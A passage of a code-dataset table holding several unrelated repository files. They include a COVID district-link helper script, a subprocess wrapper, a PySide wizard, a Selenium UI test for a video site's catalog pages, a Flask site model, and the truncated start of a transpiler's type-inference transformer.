| max_stars_repo_path (string, length 3–269) | max_stars_repo_name (string, length 4–119) | max_stars_count (int64, 0–191k) | id (string, length 1–7) | content (string, length 6–1.05M) | score (float64, 0.23–5.13) | int_score (int64, 0–5) |
|---|---|---|---|---|---|---|
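A minimal sketch of reading a table with this schema using pandas, assuming the rows are stored as Parquet; the file name below is hypothetical and not part of this dump:
import pandas as pd
# Hypothetical shard name; this dump does not say how the table is stored on disk.
df = pd.read_parquet("code_dataset_shard.parquet")
# Keep only higher-quality files, using the score columns described above.
good = df[df["int_score"] >= 3]
print(good[["max_stars_repo_name", "max_stars_repo_path", "score"]].head())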
api/linkCreationHelpers.py
|
healthIMIS/aha-kompass
| 2
|
12777951
|
<reponame>healthIMIS/aha-kompass
#!/usr/bin/env python3
# Corona-Info-App
#
# © 2020 <NAME>.
# Include utilities
import urllib
import json
from sqlalchemy import or_
import bs4
import visvalingamwyatt as vw
# Include db connection
from main import db, api
# Include models
from models.districts import districts, updateDistrictIncidence, createRegionIfNotExists
from models.measures import sources, regionHasGroup, display, createSource
from utils.measure_utils import createDefaultGroup
from sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound
import requests
#For multithreading
import multiprocessing
import threading
from queue import Queue
def part1():
with open('landkreise.json') as f:
data = json.load(f)
result = {
"ok" : [],
"err" : []
}
for d in data:
region_id = createRegionIfNotExists(d["Bundesland"]).id
print(region_id)
html_soup = bs4.BeautifulSoup(d["Regionale Einschränkungen"], 'html.parser')
for l in html_soup.findAll('a'):
category = None
name = None
if l.text[0:10] == "Landkreis ":
category = "Landkreis"
name = l.text[10:]
elif l.text[-10:] == " Landkreis":
category = "Landkreis"
name = l.text[:-11]
elif l.text[0:11] == "Stadtkreis ":
category = "Stadtkreis"
name = l.text[11:]
elif l.text[0:17] == "Kreisfreie Stadt ":
category = "Kreisfreie Stadt"
name = l.text[17:]
elif l.text[-17:] == " kreisfreie Stadt":
category = "Kreisfreie Stadt"
name = l.text[:-18]
elif l.text[0:6] == "Stadt ":
category = "Kreisfreie Stadt"
name = l.text[6:]
elif l.text[0:6] == "Kreis ":
category = "Landkreis"
name = l.text[6:]
elif not "RKI" in l.text:
name = l.text
if name != None:
try:
if category != None:
if category == "Landkreis":
d = districts.query.filter(districts.name.like("%{}%".format(name)), districts.region_id == region_id, or_(districts.category == "Landkreis", districts.category == "Kreis")).one()
else:
d = districts.query.filter(districts.name.like("%{}%".format(name)), districts.region_id == region_id, districts.category == category).one()
else:
d = districts.query.filter(districts.name.like("%{}%".format(name)), districts.region_id == region_id).one()
result["ok"].append({"id": d.id, "link": l["href"], "comment": l.text})
except NoResultFound:
result["err"].append({"id": None, "link": l["href"], "comment": l.text})
except MultipleResultsFound:
result["err"].append({"id": None, "link": l["href"], "comment": l.text})
with open('districtlinks.json', 'w') as json_file:
json.dump(result, json_file)
def part2():
with open('links.json') as f:
data = json.load(f)
abgedeckt = {}
for d in data:
abgedeckt[d["id"]] = d
result = {
"ok" : data,
"missing" : []
}
for d in districts.query.all():
if d.id not in abgedeckt:
result["missing"].append({"id": d.id, "link": "", "comment": d.name_de})
print(d.id)
#with open('districtlinks2.json', 'w') as json_file:
# json.dump(result, json_file)
def part3():
with open('links.json') as f:
data = json.load(f)
jobQueue = Queue()
resultQueue = Queue()
for d in data:
jobQueue.put(d)
for i in range(multiprocessing.cpu_count()):
worker = threading.Thread(target=part3_helper, args=(jobQueue,resultQueue))
worker.start()
jobQueue.join()
print("DONE")
result = []
for q_item in resultQueue.queue:
result.append(q_item)
with open('unsuccessfull.json', 'w') as json_file:
json.dump(result, json_file)
def part3_helper(q, resultQueue):
while not q.empty():
job = q.get()
try:
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"}
r = requests.get(job["link"], timeout=(5, 10), headers=headers)
if r.status_code != 200:
res = job
res["statusCode"] = r.status_code,
print(res)
resultQueue.put(res)
except requests.exceptions.RequestException as e: # This is the correct syntax
res = job
res["exception"] = str(e),
print(res)
resultQueue.put(res)
q.task_done()
#part3()
import os
def tiles():
from pathlib import Path
jobQueue = Queue()
files = list(Path("../app/src/static/tiles").rglob("*.png"))
for f in files:
jobQueue.put(str(f))
for i in range(multiprocessing.cpu_count()):
worker = threading.Thread(target=tile_helper, args=(jobQueue,))
worker.start()
jobQueue.join()
print("DONE")
def tile_helper(q):
while not q.empty():
job = q.get()
try:
os.system("convert "+job+" -quality 85 "+job[:-3]+"jpg")
os.system("rm "+job)
except Exception: # don't let one failing tile stop the worker
print("Something went wrong:", job)
q.task_done()
tiles()
| 2.15625
| 2
|
lib/utils.py
|
gmelillo/registry
| 0
|
12777952
|
<gh_stars>0
import threading
import logging
import os
import signal
import subprocess
import shlex
class Command(object):
def __init__(self, cmd, **kwargs):
self.cmd = cmd
self.process = None
self.log = logging.getLogger(f'{__name__}.{self.__class__.__name__}')
self.timeout = kwargs.get('timeout', None)
self.graceful_period = kwargs.get('graceful_period', 30)
def run(self):
def target():
try:
self.process = subprocess.Popen(shlex.split(self.cmd), shell=False, env=os.environ.copy(),
preexec_fn=os.setsid, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
except Exception as e:
self.log.error(f'unable to execute the command: {e.__str__()}')
return
while True:
output = self.process.stdout.readline()
if output:
self.log.info(output.strip())
if self.process.poll() is not None:
break
return self.process.poll()
self.log.debug(f'Executing command {shlex.split(self.cmd)[0]} with {self.timeout}s of timeout and {self.graceful_period}s of grace period')
thread = threading.Thread(target=target)
thread.start()
thread.join(self.timeout)
if thread.is_alive():
os.killpg(self.process.pid, signal.SIGTERM)
thread.join(self.graceful_period)
if thread.is_alive():
os.killpg(self.process.pid, signal.SIGKILL)
thread.join()
self.log.debug(f'Execution of command {shlex.split(self.cmd)[0]} terminated')
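# Usage sketch (my addition, not part of the original module): run a command with
# a 10-second timeout and a 5-second grace period before SIGKILL. The command and
# values are illustrative only.
#
#     logging.basicConfig(level=logging.DEBUG)
#     Command('sleep 60', timeout=10, graceful_period=5).run()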
| 2.375
| 2
|
futura_ui/app/ui/wizards/regionalisation_wizard.py
|
pjamesjoyce/futura
| 6
|
12777953
|
from PySide2 import QtWidgets, QtCore
import os
from ..utils import load_ui_file
from ..widgets.filter import FilterListerWidget, parse_filter_widget
from ..widgets.geo import LocationSelectorWidget
from ...utils import findMainWindow
from futura.utils import create_filter_from_description
from futura import w
from futura.proxy import WurstProcess
class RegionalisationWizard(QtWidgets.QWizard):
def __init__(self, parent=None):
super(RegionalisationWizard, self).__init__(parent)
ui_path = 'regionalisation_wizard.ui'
ui_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), ui_path)
load_ui_file(ui_path, self)
self.filter_widget = FilterListerWidget()
self.filterLayout.addWidget(self.filter_widget)
self.location_widget = LocationSelectorWidget()
self.locationLayout.addWidget(self.location_widget)
self.currentIdChanged.connect(self.page_change)
def page_change(self, page_id):
if page_id == 1:
self.restrict_locations()
elif page_id == 2:
self.confirm_setup()
def confirm_setup(self):
print("This is the last page")
this_filter = create_filter_from_description(parse_filter_widget(self.filter_widget))
db = findMainWindow().loader.database.db
this_item_set = [WurstProcess(x) for x in w.get_many(db, *this_filter)]
#this_item = w.get_one(db, *this_filter)
print(this_item_set)
item_string = ""
for n, this_item in enumerate(this_item_set):
item_string += "{} ({}) [{}]".format(this_item['name'], this_item['unit'], this_item['location'])
if n != len(this_item_set) - 1:
item_string += "\n"
self.processLabel.setText(item_string)
if len(this_item_set) > 1:
self.processDescriptionLabel.setText('Base processes: ')
else:
self.processDescriptionLabel.setText('Base process: ')
location_list = ", ".join([x['display'] for x in self.location_widget.checked_items])
self.locationLabel.setText(location_list)
def restrict_locations(self):
base_filter = parse_filter_widget(self.filter_widget)
no_location_filter = [x for x in base_filter if x['args'][0] != 'location']
this_filter = create_filter_from_description(base_filter)
no_location = create_filter_from_description(no_location_filter)
db = findMainWindow().loader.database.db
this_item = w.get_one(db, *this_filter)
item_location = this_item['location']
other_items = w.get_many(db, *no_location)
other_locations = [x['location'] for x in other_items]
other_locations = [x for x in other_locations if x != 'RoW']
locations = list(set(other_locations + [item_location]))
print(locations)
self.location_widget.find_and_disable(locations)
| 2.125
| 2
|
test_case_4_3.py
|
Alekseybykov126/autotesting
| 0
|
12777954
|
<filename>test_case_4_3.py
from Regress_web.page import *
time.sleep(1)
def case_4_3(self, full_screen):
self.page.loger('\n Запуск Тест кейс № 4_3 tvweb_new-4_3: Проверка работоспособности кнопок "Смотреть все" с главной страницы \n')
time.sleep(2)
## Бесплатные фильмы
self.page.loger('Шаг 1. Проверка наличия Покупки и Подписки в списке бесплатных фильмов')
#self.page.waitForElementVisible('.//div[@id="compilation-216"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-12"]')
target.location_once_scrolled_into_view
self.page.waitForElementVisible('.//div[@id="compilation-216"]', 10) # Контейнер с фильмами
status_txt = str(self.result.find_link("div", "compilation-216")) # Исключает Покупку и Подписку из списка фильмов
assert('Покупка') not in status_txt
assert('Подписка') not in status_txt
self.driver.find_elements_by_xpath('.//button[@data-related-compilation-id="216"]')[1].click() # Клик стрелки прокрутки вправо
time.sleep(2)
self.page.waitForElementVisible('.//div[@id="compilation-216"]', 10)
status_txt = str(self.result.find_link("div", "compilation-216"))
assert('Покупка') not in status_txt
assert('Подписка') not in status_txt
self.driver.find_element_by_xpath('.//button[@data-related-compilation-id="216"]').click() # Клик стрелки прокрутки влево
time.sleep(1)
self.driver.find_element_by_xpath('.//button[@data-related-compilation-id="216"]').click() # Клик стрелки прокрутки влево
self.page.waitForElementVisible('.//div[@id="compilation-216"]', 10)
status_txt = str(self.result.find_link("div", "compilation-216"))
assert('Покупка') not in status_txt
assert('Подписка') not in status_txt
self.driver.find_element_by_xpath('.//button[@data-related-compilation-id="216"]').click() # Клик стрелки прокрутки влево
self.page.waitForElementVisible('.//div[@id="compilation-216"]', 10)
status_txt = str(self.result.find_link("div", "compilation-216"))
assert('Покупка') not in status_txt
assert('Подписка') not in status_txt
self.page.loger('В разделе "Бесплатные фильмы" отсутствуют платные и фильмы по подписке')
time.sleep(2)
self.page.loger('Шаг 2. Проверка перехода в раздел "Бесплатные фильмы" через кнопку "Смотреть все"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/besplatnye-filmy/"]').click() # Клик на "Смотреть все"
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Бесплатные фильмы') in head_txt
self.page.loger('Переход в раздел "Бесплатные фильмы" подтвержден')
self.driver.back()
time.sleep(3)
### Новинки
target = self.driver.find_element_by_xpath('.//div[@id="compilation-60"]')
target.location_once_scrolled_into_view
self.page.loger('Шаг 3. Проверка раздела "Новинки"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/novinki/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Новинки') in head_txt
self.page.loger('Переход в раздел "Новинки" подтвержден')
self.driver.back()
time.sleep(3)
## Фильмы на Хэллоуин____________!
self.page.loger('Шаг 4. Проверка раздела "Фильмы на Хэллоуин"')
target = self.driver.find_element_by_xpath('.//div[@id="compilation-suggestions-base"]')
target.location_once_scrolled_into_view
self.driver.find_element_by_xpath('.//a[@href="/catalog/helloween/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Фильмы на Хэллоуин') in head_txt
self.page.loger('Переход в раздел "Фильмы на Хэллоуин" подтвержден')
self.driver.back()
time.sleep(3)
## Смотреть по подписке
target = self.driver.find_element_by_xpath('.//div[@id="compilation-216"]')
target.location_once_scrolled_into_view
self.page.waitForElementVisible('.//div[@id="compilation-60"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-60"]') # скролл до подборки на Хэллоуин
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.waitForElementVisible('.//div[@id="compilation-260"]', 10) # Контейнер с фильмами
status_txt = str(self.result.find_link("div", "compilation-260")) # Исключает Покупку и Бесплатно из списка фильмов
assert('Покупка') not in status_txt
assert('Бесплатно') not in status_txt
self.driver.find_elements_by_xpath('.//button[@data-related-compilation-id="260"]')[1].click() # Клик стрелки прокрутки вправо
time.sleep(2)
self.page.waitForElementVisible('.//div[@id="compilation-260"]', 10)
status_txt = str(self.result.find_link("div", "compilation-260"))
assert('Покупка') not in status_txt
assert('Бесплатно') not in status_txt
self.driver.find_element_by_xpath('.//button[@data-related-compilation-id="260"]').click() # Клик стрелки прокрутки влево
time.sleep(1)
self.driver.find_element_by_xpath('.//button[@data-related-compilation-id="260"]').click() # Клик стрелки прокрутки влево
self.page.waitForElementVisible('.//div[@id="compilation-216"]', 10)
status_txt = str(self.result.find_link("div", "compilation-216"))
assert('Покупка') not in status_txt
assert('Бесплатно') not in status_txt
self.driver.find_element_by_xpath('.//button[@data-related-compilation-id="260"]').click() # Клик стрелки прокрутки влево
self.page.waitForElementVisible('.//div[@id="compilation-216"]', 10)
status_txt = str(self.result.find_link("div", "compilation-216"))
assert('Покупка') not in status_txt
assert('Бесплатно') not in status_txt
self.page.loger('В разделе "Смотреть по подписке" отсутствуют платные и бесплатные фильмы')
time.sleep(2)
self.page.loger('Шаг 5. Проверка перехода в раздел "Смотреть по подписке" через кнопку "Смотреть все"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/smotret-po-podpiske/"]').click() # Клик на "Смотреть все"
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Смотреть по подписке') in head_txt
self.page.loger('Переход в раздел "Смотреть по подписке" подтвержден')
self.driver.back()
time.sleep(3)
## Лучшие фильмы киностудии Paramount
self.page.waitForElementVisible('.//div[@id="compilation-260"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-260"]') # скролл до подборки Смотреть по подписке
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 6. Проверка раздела "Лучшие фильмы киностудии Paramount"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/luchshie-filmy-kinostudii-paramount/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Лучшие фильмы киностудии Paramount') in head_txt
self.page.loger('Переход в раздел "Лучшие фильмы киностудии Paramount" подтвержден')
self.driver.back()
time.sleep(3)
## Фильмы ужасов
self.page.waitForElementVisible('.//div[@id="compilation-228"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-228"]') # скролл до подборки Смотреть по подписке
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 7. Проверка раздела "Фильмы ужасов"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/filmy-uzhasov/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Фильмы ужасов') in head_txt
self.page.loger('Переход в раздел "Фильмы ужасов" подтвержден')
time.sleep(2)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на развернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow rollup_open"]', 10)
time.sleep(1)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на свернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow"]', 10)
time.sleep(1)
self.page.loger('Кнопка Свернуть/Развернуть работает')
self.driver.back()
time.sleep(3)
### MoviesChain by tvzavr
self.page.waitForElementVisible('.//div[@id="compilation-23"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-23"]') # скролл до подборки
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 8. Проверка раздела "MoviesChain by tvzavr"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/movieschain/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('MoviesChain by tvzavr') in head_txt
self.page.loger('Переход в раздел "MoviesChain by tvzavr" подтвержден')
self.driver.back()
time.sleep(3)
### Современные мультфильмы
self.page.waitForElementVisible('.//div[@id="compilation-230"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-230"]') # скролл до подборки
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 9. Проверка раздела "Современные мультфильмы"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/modern-cartoons/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Современные мультфильмы') in head_txt
self.page.loger('Переход в раздел "Современные мультфильмы" подтвержден')
time.sleep(2)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на развернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow rollup_open"]', 10)
time.sleep(1)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на свернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow"]', 10)
time.sleep(1)
self.page.loger('Кнопка Свернуть/Развернуть работает')
self.driver.back()
time.sleep(3)
## Лучшие ремейки
self.page.waitForElementVisible('.//div[@id="compilation-6"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-6"]') # скролл до подборки Смотреть по подписке
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 10. Проверка раздела "Лучшие ремейки"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/luchshie-remeyki/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Лучшие ремейки') in head_txt
self.page.loger('Переход в раздел "Лучшие ремейки" подтвержден')
self.driver.back()
time.sleep(3)
## Молодёжные комедии
self.page.waitForElementVisible('.//div[@id="compilation-279"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-279"]') # скролл до подборки
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 11. Проверка раздела "Молодёжные комедии"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/molodezhnye-komedii/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Молодёжные комедии') in head_txt
self.page.loger('Переход в раздел "Молодёжные комедии" подтвержден')
time.sleep(2)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на развернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow rollup_open"]', 10)
time.sleep(1)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на свернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow"]', 10)
time.sleep(1)
self.page.loger('Кнопка Свернуть/Развернуть работает')
self.driver.back()
time.sleep(3)
## Французские фильмы
self.page.waitForElementVisible('.//div[@id="compilation-139"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-139"]') # скролл до подборки
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 12. Проверка раздела "Французские фильмы"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/frantsuzskie-filmy/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Французские фильмы') in head_txt
self.page.loger('Переход в раздел "Французские фильмы" подтвержден')
time.sleep(2)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на развернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow rollup_open"]', 10)
time.sleep(1)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на свернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow"]', 10)
time.sleep(1)
self.page.loger('Кнопка Свернуть/Развернуть работает')
self.driver.back()
time.sleep(3)
## Психологические триллеры
self.page.waitForElementVisible('.//div[@id="compilation-18"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-18"]') # скролл до подборки Смотреть по подписке
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 13. Проверка раздела "Психологические триллеры"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/psihologicheskie-trillery/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Психологические триллеры') in head_txt
self.page.loger('Переход в раздел "Психологические триллеры" подтвержден')
self.driver.back()
time.sleep(3)
### Советские мультфильмы
self.page.waitForElementVisible('.//div[@id="compilation-91"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-91"]') # скролл до подборки
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 14. Проверка раздела "Советские мультфильмы"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/sovetskie-multfilmy/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Советские мультфильмы') in head_txt
self.page.loger('Переход в раздел "Советские мультфильмы" подтвержден')
time.sleep(2)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на развернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow rollup_open"]', 10)
time.sleep(1)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на свернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow"]', 10)
time.sleep(1)
self.page.loger('Кнопка Свернуть/Развернуть работает')
self.driver.back()
time.sleep(3)
### Высокобюджетные фильмы
self.page.waitForElementVisible('.//div[@id="compilation-17"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-17"]') # скролл до подборки Смотреть по подписке
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 15. Проверка раздела "Высокобюджетные фильмы"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/vysokobyudzhetnye-filmy/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Высокобюджетные фильмы') in head_txt
self.page.loger('Переход в раздел "Высокобюджетные фильмы" подтвержден')
self.driver.back()
time.sleep(3)
### Фильмы из Топ-250 КиноПоиска
self.page.waitForElementVisible('.//div[@id="compilation-41"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-41"]') # скролл до подборки Смотреть по подписке
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 16. Проверка раздела "Фильмы из Топ-250 КиноПоиска"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/filmy-iz-top-250-kinopoiska/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Фильмы из Топ-250 КиноПоиска') in head_txt
self.page.loger('Переход в раздел "Фильмы из Топ-250 КиноПоиска" подтвержден')
self.driver.back()
time.sleep(3)
### Фильмы, основанные на реальных событиях
self.page.waitForElementVisible('.//div[@id="compilation-48"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-48"]') # скролл до подборки Смотреть по подписке
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 17. Проверка раздела "Фильмы, основанные на реальных событиях"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/filmy-osnovannye-na-realnyh-sobytiyah/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Фильмы, основанные на реальных событиях') in head_txt
self.page.loger('Переход в раздел "Фильмы, основанные на реальных событиях" подтвержден')
self.driver.back()
time.sleep(3)
### Биографические фильмы
self.page.waitForElementVisible('.//div[@id="compilation-26"]', 10)
target = self.driver.find_element_by_xpath('.//div[@id="compilation-26"]') # скролл до подборки
target.location_once_scrolled_into_view # скролл
time.sleep(2)
self.page.loger('Шаг 18. Проверка раздела "Биографические фильмы"')
self.driver.find_element_by_xpath('.//a[@href="/catalog/biograficheskie-filmy/"]').click()
time.sleep(3)
self.page.waitForElementVisible('.//h1[@class="page__heading superheading-1"]', 10)
head_txt = str(self.result.find_link("h1", "page__heading superheading-1"))
assert('Биографические фильмы') in head_txt
self.page.loger('Переход в раздел "Биографические фильмы" подтвержден')
time.sleep(2)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на развернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow rollup_open"]', 10)
time.sleep(1)
self.driver.find_element_by_xpath('.//button[@class="rollup__toggle js-rollup-toggle"]').click() # Клик на свернуть
self.page.waitForElementVisible('.//div[@class="page__description seo-info rollup js-rollup rollup_overflow"]', 10)
time.sleep(1)
self.page.loger('Кнопка Свернуть/Развернуть работает')
self.driver.back()
time.sleep(3)
self.driver.quit()
| 2.171875
| 2
|
stacksites/sites/models.py
|
jasonvfang/StackSites
| 0
|
12777955
|
<gh_stars>0
# -*- coding: utf-8 -*-
from datetime import datetime
from stacksites.database import db, CRUDMixin
from .utils import upload_index_for_new_site, make_s3_path, get_files_data, delete_site_from_s3, transfer_landing_demo
class Site(CRUDMixin, db.Model):
__tablename__ = 'site'
name = db.Column(db.String(64), nullable=False)
created_at = db.Column(db.DateTime(), nullable=False)
updated_at = db.Column(db.DateTime(), nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
def __init__(self, name, user, temp_file_id=None):
self.name = name
self.created_at = datetime.utcnow()
self.updated_at = datetime.utcnow()
self.user = user
if temp_file_id is not None:
transfer_landing_demo(temp_file_id, user.username, name)
else:
upload_index_for_new_site(user.username, name)
def update_time(self):
self.updated_at = datetime.utcnow()
self.save()
def get_files(self, folder_key=None):
return get_files_data(self.user.username, self.name, folder_key)
def delete_site(self):
delete_site_from_s3(self.user.username, self.name)
self.delete()
def __repr__(self):
username = self.user or ""
return "<Site ({0}, user: {1})>".format(self.name, username)
| 2.296875
| 2
|
mys/transpiler/infer_types_transformer.py
|
eerimoq/sython
| 0
|
12777956
|
from ..parser import ast
from .utils import BUILTIN_TYPES
from .utils import CompileError
from .utils import is_upper_snake_case
class Placeholder(ast.AST):
pass
class TypeVisitor(ast.NodeVisitor):
def __init__(self, context):
self.context = context
def visit_Constant(self, node):
if isinstance(node.value, int):
return ast.Name(id='i64')
elif isinstance(node.value, str):
return ast.Name(id='string')
return None
def visit_Call(self, node):
if isinstance(node.func, ast.Name):
function_name = node.func.id
if function_name in BUILTIN_TYPES:
return ast.Name(id=function_name)
else:
functions = self.context.module_definitions.functions.get(
function_name)
if functions is not None:
returns = functions[0].node.returns
if returns is not None:
return returns
return None
class Context:
def __init__(self, module_definitions, definitions):
self.module_definitions = module_definitions
self.definitions = definitions
self.variables = {}
self.incomplete_variables = {}
self.stack = [[]]
def push(self):
self.stack.append([])
def pop(self):
for name in self.stack.pop():
self.variables.pop(name)
def define_variable(self, name, mys_type):
self.variables[name] = mys_type
self.stack[-1].append(name)
def define_incomplete_variable(self, name, node, ann_node):
self.incomplete_variables[name] = (node, ann_node)
self.stack[-1].append(name)
class InferTypesTransformer(ast.NodeTransformer):
"""Traverses the AST and replaces `ast.Assign` with `ast.AnnAssign`
where types are defined.
"""
def __init__(self, module_definitions, definitions):
self.module_definitions = module_definitions
self.definitions = definitions
self.context = None
self.returns = None
def visit_AnnAssign(self, node):
if self.context is None:
return node
if not isinstance(node.target, ast.Name):
return node
variable_name = node.target.id
if is_upper_snake_case(variable_name):
return node
if variable_name in self.context.variables:
return node
if variable_name in self.context.incomplete_variables:
return node
self.context.define_variable(variable_name, None)
return node
def visit_Assign(self, node):
if self.context is None:
return node
if len(node.targets) != 1:
return node
if not isinstance(node.targets[0], ast.Name):
return node
variable_name = node.targets[0].id
if is_upper_snake_case(variable_name):
return node
if variable_name in self.context.variables:
return node
if variable_name in self.context.incomplete_variables:
return node
ann_node = None
if isinstance(node.value, ast.List):
if len(node.value.elts) == 0:
ann_node = ast.AnnAssign(target=ast.Name(id=variable_name),
annotation=ast.List(elts=[Placeholder()]),
value=node.value)
elif isinstance(node.value, ast.Dict):
if len(node.value.keys) == 0:
# Dict or set.
ann_node = ast.AnnAssign(target=ast.Name(id=variable_name),
annotation=Placeholder(),
value=node.value)
elif isinstance(node.value, ast.Constant):
if node.value.value is None:
ann_node = ast.AnnAssign(target=ast.Name(id=variable_name),
annotation=Placeholder(),
value=node.value)
if ann_node is not None:
self.context.define_incomplete_variable(variable_name, node, ann_node)
node = ann_node
